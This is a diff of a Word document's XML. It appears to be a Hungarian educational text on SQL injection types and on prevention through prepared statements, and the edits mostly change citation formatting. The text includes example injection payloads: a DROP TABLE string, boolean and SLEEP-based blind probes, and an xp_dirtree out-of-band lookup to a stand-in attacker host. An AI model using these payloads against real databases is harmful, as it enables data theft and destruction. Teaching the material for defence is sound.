     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc70961902"/>
+      <w:r>
+        <w:t>Sávon belüli</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(in-band</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, classic</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SQLi</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -3980,19 +3768,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Továbbiakban a kódok </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>utáni felső indexben található szám</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, mint hivatkozás</w:t>
+        <w:t>Ahogy a korábbi példa szemléltette,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4004,74 +3780,43 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">megegyezik </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>az irodalomjegyzék</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ben lévő tétel sorszámával.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:ind w:left="709" w:hanging="709"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc70610876"/>
-      <w:r>
-        <w:t>Sávon belüli</w:t>
-      </w:r>
-      <w:r>
+        <w:t>a s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ikeres SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njection támadás képes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-band</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, classic</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ahogy a korábbi példa szemléltette,</w:t>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>érzékeny adatok kiolvasására az adatbázisból</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4083,25 +3828,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ikeres SQL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>njection támadás képes</w:t>
+        <w:t>Egyik l</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egfőbb eszköze a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4111,15 +3850,23 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>érzékeny adatok kiolvasására az adatbázisból</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>UNION</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> operátor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, amely lehetővé tesz egy vagy több további</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4129,21 +3876,29 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Egyik l</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egfőbb eszköze a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z</w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SELECT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lekérdezés végrehajtását és az eredmények hozzáfűzését az eredeti lekérdezéshez.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Sikerességének feltétele, hogy a két</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vagy több</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4157,65 +3912,6 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>UNION</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> operátor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, amely lehetővé tesz egy vagy több további</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>SELECT</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> lekérdezés végrehajtását és az eredmények hozzáfűzését az eredeti lekérdezéshez.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Sikerességének feltétele, hogy a két</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vagy több</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>SELECT</w:t>
       </w:r>
       <w:r>
@@ -4330,6 +4026,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>105; DROP TABLE Suppliers</w:t>
       </w:r>
       <w:r>
@@ -4337,7 +4034,13 @@
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4546,7 +4249,13 @@
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>2</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4702,10 +4411,9 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>3</w:t>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [3]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4856,7 +4564,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc70610877"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc70961903"/>
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
@@ -5137,10 +4845,146 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [4]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy lekérdezést generál:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>’ AND 1=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>4</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[4]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ha az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">alkalmazás sebezhető SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njekcióval szemben, akkor nem ad vissza semmit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, mivel ez egy hamis állítás, 1 nem egyenlő </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>l.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ezek után, ha</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egy igaz állítást adunk meg: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5148,13 +4992,36 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>' AND 1=1 --+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>egy lekérdezést generál:</w:t>
+        <w:t>[4]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5162,186 +5029,38 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>’ AND 1=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ha az </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">alkalmazás sebezhető SQL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>njekcióval szemben, akkor nem ad vissza semmit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, mivel ez egy hamis állítás, 1 nem egyenlő </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-v</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>l.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Ezek után, ha</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egy igaz állítást </w:t>
+        <w:t>és az oldal tartalma megváltozik az előző hamis állapothoz képest, akkor a támadó arra következtethet, hogy az injekció működik</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A logikai eredménytől (IGAZ vagy </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">adunk meg: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>' AND 1=1 --+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>és az oldal tartalma megváltozik az előző hamis állapothoz képest, akkor a támadó arra következtethet, hogy az injekció működik</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A logikai eredménytől (IGAZ vagy HAMIS) függően </w:t>
+        <w:t xml:space="preserve">HAMIS) függően </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5483,73 +5202,78 @@
       </w:r>
       <w:r>
         <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>5</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>5</w:t>
+        <w:t>[5]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5570,7 +5294,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc70610878"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc70961904"/>
       <w:r>
         <w:t>Sávon kívüli (</w:t>
       </w:r>
@@ -5733,7 +5457,13 @@
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>6</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5781,14 +5511,28 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' --</w:t>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>–</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>6</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5817,7 +5561,13 @@
           <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>6</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5920,7 +5670,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc70610879"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc70961905"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5930,7 +5680,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Megelőzési módjai</w:t>
       </w:r>
       <w:bookmarkEnd w:id="11"/>
@@ -6034,17 +5783,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Stlus3"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc70610880"/>
-      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Elkészített utasítások (prepared statements) használata</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6127,7 +5877,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>példáját (7. oldal)</w:t>
+        <w:t>példáját</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6145,7 +5895,19 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a paraméterezett lekérdezés </w:t>
+        <w:t>a paraméterezett lekérdezés</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6193,14 +5955,14 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="1701"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
